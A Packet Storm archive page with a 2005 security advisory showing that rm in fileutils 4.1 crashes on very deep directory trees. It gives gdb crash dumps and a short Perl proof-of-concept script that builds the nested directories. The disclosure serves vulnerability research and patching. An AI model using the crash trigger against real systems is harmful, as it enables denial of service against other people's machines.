exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

fileutils-4.1.txt

fileutils-4.1.txt
Posted Aug 26, 2005
Authored by Carlos Carvalho | Site nutshell.gotfault.net

Fileutils 4.1 programs crash when working with huge directory trees. Proof of concept included.

tags | advisory, proof of concept
SHA-256 | 9b92da80932cccb05d1b78007d83a22161864bc8382d6afa2e21cdfded8047e5

fileutils-4.1.txt

Change Mirror Download
Thu Aug 25 20:53:05 BRT 2005

Original advisory: http://nutshell.gotfault.net/papers/adv_rm.txt

Sumary:
rm gets SIGSEGV while trying to remove a very huge directory tree,
about 14986 sub-directories or more.

Bug discovered by nuTshell

Vulnerable versions:
rm (fileutils) 4.1 maybe lower or higher

Imune versions:
rm (coreutils) 5.2.1

Solution:
Upgrade to rm (coreutils) 5.2.1

While rm`ing a huge directory tree with about 14986 sub-directories we have
different behaviors adding a bit more dir-trees or taking off a bit more
dir-tree. In my system i`ve these two behaviors:

$ gdb -q /bin/rm
(no debugging symbols found)...(gdb)
(gdb) r -rf A
Starting program: /bin/rm -rf A
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0xb7e880dc in __lxstat64 () from /lib/libc.so.6
(gdb) i r
eax 0xbf711138 -1083109064
ecx 0x804d820 134535200
edx 0x0 0
ebx 0x0 0
esp 0xbf711000 0xbf711000
ebp 0xbf711088 0xbf711088
esi 0x809c1fb 134857211
edi 0x80a6c70 134900848
eip 0xb7e880dc 0xb7e880dc
eflags 0x10286 66182
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x0 0
fctrl 0x37f 895
fstat 0x20 32
ftag 0xffff 65535
fiseg 0x73 115
fioff 0x804b728 134526760
foseg 0x7b 123
fooff 0x804d828 134535208
fop 0x6d9 1753
mxcsr 0x1f80 8064
orig_eax 0xffffffff -1
(gdb)

In other test i`ve got:

$ gdb -q /bin/rm
(no debugging symbols found)...(gdb)
(gdb) r -rf A
Starting program: /bin/rm -rf A
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x08049fc4 in strcpy ()
(gdb) i r
eax 0xbfaa5850 -1079355312
ecx 0x8051060 134549600
edx 0x0 0
ebx 0x0 0
esp 0xbf2a6000 0xbf2a6000
ebp 0xbf2a6118 0xbf2a6118
esi 0x809eb93 134867859
edi 0x80dfca8 135134376
eip 0x8049fc4 0x8049fc4
eflags 0x10283 66179
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x0 0
fctrl 0x37f 895
fstat 0x20 32
ftag 0xffff 65535
fiseg 0x73 115
fioff 0x804b728 134526760
foseg 0x7b 123
fooff 0x804d828 134535208
fop 0x6d9 1753
mxcsr 0x1f80 8064
orig_eax 0xffffffff -1
(gdb)

Maybe it is possible to execute arbitrary code in special situations (local
or remote).
The code i have used to test these situations is attached below:

----- cut here -----
#!/usr/bin/perl
# Code that gets Segmentation fault from rm
# while trying to remove huge directory tree
# by nuTshell <http://nutshell.gotfault.net>

$end = shift or $end = 15;

mkdir("./Z") or die "Cannot create dir: $!\n";
system("/bin/rmdir ./Z") ;

$changing = 2045 / 5;
$dir2 = "A/"x$changing;

print "Wait while $0 create directory tree...\n";
for ($xix=0;$xix<36;$xix++) {
system ("mkdir -p $dir2");
chdir("$dir2");
}

$dir2 = "A/"x20;
for ($ipsilon=0;$ipsilon<$end;$ipsilon++) {
$xix++;
system ("mkdir -p $dir2");
chdir("$dir2");
}
print "Done, try rm -rf A\n";
#eof
---- cut here -----

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close